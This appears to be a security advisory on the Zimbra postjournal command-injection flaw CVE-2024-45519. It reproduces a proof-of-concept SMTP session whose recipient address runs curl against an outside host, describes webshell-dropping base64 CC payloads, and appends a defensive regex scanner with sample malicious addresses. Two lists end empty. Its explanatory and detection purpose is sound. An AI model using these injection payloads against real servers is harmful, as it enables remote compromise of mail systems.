A critical vulnerability (CVE-2024-45519) in Zimbra’s postjournal service that allows unauthenticated remote command execution is under active attack.
The vulnerability allows unsanitized user input to be passed to popen, enabling attackers to inject arbitrary commands.
Patched versions add input sanitization and replace popen with execvp to mitigate the direct command injection vulnerability. Zimbra administrators should also check the configuration of the mynetworks parameter to prevent external exploitation.
Patched versions include these versions and newer:
One IP that has been identified as a source of malicious emails and exploit attempts is 79.124.49[.]86.
Exploitation began after ProjectDiscovery researchers reported a Proof of Concept (PoC) for the vulnerability.
The researchers reverse-engineered the postjournal binary and found no calls to execvp or to the run_command function. Instead, the read_maps function called popen directly, so input reached the shell without sanitization. Because the address was wrapped in double quotes inside the cmd string passed to popen, simple shell metacharacters would not break out of the string, but that control could be bypassed with $() command substitution syntax.
The postjournal service was then exploited via port 10027 with the following SMTP commands:

```text
EHLO localhost
MAIL FROM: <[email protected]>
RCPT TO: <"aabbb$(curl${IFS}oast.me)"@mail.domain.com>
DATA
Test message
.
```
The same exploit over SMTP port 25 required the postjournal service to be enabled, which was accomplished with a Bash script:

```bash
zmlocalconfig -e postjournal_enabled=true
zmcontrol restart
```
As for remote exploitation, the researchers found that the default mynetworks configuration included a /20 CIDR range containing their public IP address, which means the exploit could be performed remotely if the postjournal service is enabled and the attacker's address falls within the allowed network range.
Proofpoint researchers have observed the vulnerability under exploitation, with spoofing emails sent to fake addresses in CC fields to try to get Zimbra servers to parse and execute them as commands. The addresses contained base64 strings that are executed with the sh utility.
Some of the emails used CC'd addresses in an attempt to build a webshell on a vulnerable Zimbra server. The full CC list is wrapped as a string, and if concatenated, the base64 blobs decode to a command that writes a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp.
Once installed, the webshell listens for inbound connections and also has support for command execution via exec or download and execute over a socket connection.
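As an added defensive example (not code from the article, ProjectDiscovery or Zimbra), a small Python scanner that flags To/CC addresses exhibiting the two patterns described above: $() or ${VAR} command substitution inside a quoted local part, and base64 blobs piped into sh. The function names, the sample header value and the sample base64 string are constructed for the demonstration.

```python
import re
# Shell constructs with no legitimate place in an SMTP local part; the PoC used $()
# to escape the double quotes postjournal placed around the address before popen.
SHELL_SUBSTITUTION = re.compile(r'\$\(|`|\$\{\w+\}')
# A base64 blob being decoded into a shell, the pattern observed in the CC payloads.
B64_TO_SHELL = re.compile(r'base64\s+(?:-d|--decode)\s*\|\s*(?:sh|bash)\b')

def split_addresses(header_value: str) -> list[str]:
    """Split a To/CC header on commas outside double quotes; return only addr-specs."""
    items, buf, in_quote = [], [], False
    for ch in header_value:
        if ch == '"':
            in_quote = not in_quote
        if ch == ',' and not in_quote:
            items.append(''.join(buf))
            buf = []
        else:
            buf.append(ch)
    items.append(''.join(buf))
    specs = []
    for item in items:
        m = re.search(r'<([^>]*)>', item)  # strip display name and angle brackets
        specs.append((m.group(1) if m else item).strip())
    return [s for s in specs if s]

def injection_indicators(addr_spec: str) -> list[str]:
    """Return the reasons an addr-spec looks like a postjournal command-injection attempt."""
    addr_spec = addr_spec.replace('\u201c', '"').replace('\u201d', '"')  # smart quotes
    local = addr_spec.rsplit('@', 1)[0]
    reasons = []
    if SHELL_SUBSTITUTION.search(local):
        reasons.append('command-substitution')
    if B64_TO_SHELL.search(local):
        reasons.append('base64-to-shell')
    if local.startswith('"') and re.search(r'[;|&]', local):
        reasons.append('shell-metachar-in-quoted-local')
    return reasons

def scan_header(header_value: str) -> dict[str, list[str]]:
    """Map each suspicious address in a To/CC header value to its indicators."""
    hits = {}
    for spec in split_addresses(header_value):
        if reasons := injection_indicators(spec):
            hits[spec] = reasons
    return hits

# Constructed sample: a benign recipient, the PoC-style address from the write-up, and
# a CC entry modelled on the base64-into-sh pattern (the blob decodes to "echo hello").
SAMPLE_CC = ('Alice <alice@example.com>, '
             '<"aabbb$(curl${IFS}oast.me)"@mail.domain.com>, '
             '"echo ZWNobyBoZWxsbw== | base64 -d | sh"@example.com')
```

Run scan_header over the CC/To header values extracted from mail logs or quarantined messages; a hit on a server running an unpatched version is a strong signal of exploitation attempts.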
Zimbra is a popular target of cyber threat actors, and CISA already includes several critical vulnerabilities in the Zimbra Product Suite in its Known Exploited Vulnerabilities catalog:
| CVE ID | Vendor/Project | Product | Vulnerability Name |
|---|---|---|---|
| CVE-2023-37580 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability |
| CVE-2022-27926 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability |
| CVE-2022-41352 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability |
| CVE-2022-27925 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability |
| CVE-2022-37042 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability |
| CVE-2022-27924 | Zimbra | Collaboration (ZCS) | Zimbra Collaboration (ZCS) Command Injection Vulnerability |
| CVE-2018-6882 | Zimbra | Collaboration Suite (ZCS) | Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability |
| CVE-2022-24682 | Zimbra | Webmail | Zimbra Webmail Cross-Site Scripting Vulnerability |
While CVE-2024-45519 has not yet been officially reported as exploited, Cyble data already shows more than 50,000 web-exposed Zimbra servers with unpatched earlier critical vulnerabilities. It remains to be seen how many will be exposed to the latest vulnerability.
All Zimbra administrators should: